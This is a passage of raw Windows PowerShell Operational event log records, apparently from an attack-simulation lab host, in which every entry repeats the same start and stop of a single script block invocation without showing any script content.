SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471500
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471499
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471498
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471497
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471496
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471495
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471494
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471493
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471492
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471491
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471490
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471489
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471488
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471487
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471486
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471485
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471484
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471483
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471482
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471481
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471480
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471479
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471478
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471477
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471476
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471475
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471474
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471473
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471472
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471471
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471470
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471469
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471468
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471467
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471466
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471465
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471464
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471463
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471462
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471461
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471460
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471459
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471458
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471457
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471456
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471455
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471454
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471453
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471452
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471451
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471450
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471449
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471448
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471447
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471446
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
